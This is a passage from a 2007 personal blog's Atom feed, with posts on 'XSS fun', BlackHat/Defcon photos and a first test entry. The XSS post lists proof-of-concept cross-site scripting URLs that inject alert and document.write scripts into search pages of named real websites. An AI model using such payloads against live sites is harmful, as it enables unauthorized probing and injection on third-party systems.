href="http://www.timesonline.co.uk/tol/sitesearch.do?query=%22;document.write('%3cb%3eDavidi%20Hakosem!%3c/b%3e');alert('Ninet%20Sholetet%20');//&amp;hitsperpage=10&amp;jumpToPrevious=0&amp;mode=SIMPLE&amp;nextOffset=0&amp;offset=0&amp;leftStartIndex=1&amp;leftEndIndex=10&amp;jumpToPrevious=0&amp;mode"&gt;Sample 2 &lt;/a&gt;&lt;br /&gt;&lt;a href="http://govtsecurity.com/searchresults/?terms=%22%3E%3Cscript%3Ealert%28%22Wow,\nNinet!%22%29%3C%2Fscript%3E&amp;x=0&amp;y=0"&gt;Sample 3&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-3771161535540602019?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://sla.ckers.org/forum/read.php?3,44,page=51' title='XSS fun'/><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/3771161535540602019/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=3771161535540602019' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/3771161535540602019'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/3771161535540602019'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/08/xss-fun.html' title='XSS fun'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-2667994480533657845</id><published>2007-08-10T07:04:00.000+03:00</published><updated>2007-08-10T07:08:34.388+03:00</updated><title type='text'>New pictures from BlackHat    &amp; defcon 2007</title><content type='html'>"Insomnia is a sleep disorder characterized by an inability to sleep and/or inability to remain asleep for a reasonable period. Insomniacs typically complain of being unable to close their eyes or "rest their mind" for more than a few minutes at a time. Both organic and nonorganic insomnia constitute a sleep disorder.[1][2] It can be caused by fear, stress, anxiety, medications, herbs, caffeine, depression, or bipolar disorder and sometimes occurs for no apparent reason. An overactive mind or physical pain may also be causes. Finding the underlying cause of insomnia is usually necessary to cure it. Insomnia can be common after the loss of a loved one, even months or a year after the death, if they are not grieving correctly (pretending they are over it when they are not). It very often occurs when the person has a lack of food or not enough variety of foods (such as eating one food over and over again)." (http://en.wikipedia.org/wiki/Insomnia)&lt;br /&gt;&lt;br /&gt;Instead of sleeping ... why not adding some pictures to the blog?&lt;br /&gt;See below the link&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-2667994480533657845?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/2667994480533657845/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=2667994480533657845' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/2667994480533657845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/2667994480533657845'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/08/new-pictures-from-blackhat-defcon-2007.html' title='New pictures from BlackHat    &amp; defcon 2007'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-5766161130025803087</id><published>2007-08-09T23:45:00.000+03:00</published><updated>2007-08-10T01:41:52.811+03:00</updated><title type='text'>On 09-08-07 , WTF</title><content type='html'>"Actually, i am just testing to see if this system works."&lt;br /&gt;&lt;br /&gt;I bet that most new blogs first statment is identical or similar to the above, but after a while the admin delete it (betting is a new habbit that i have imported latly)&lt;br /&gt;&lt;br /&gt;While trying to get over with one week (*) Jet lag i got, from firsly visit in the US (VEgas.. Yoo hoo), and from some weird and not specific reasonable reason, i have decided that openning my own blog will cure the problem.(* "Problem" - See above for legal clarifications)&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-5766161130025803087?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/5766161130025803087/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=5766161130025803087' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/5766161130025803087'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/5766161130025803087'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/08/testing.html' title='On 09-08-07 , WTF'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
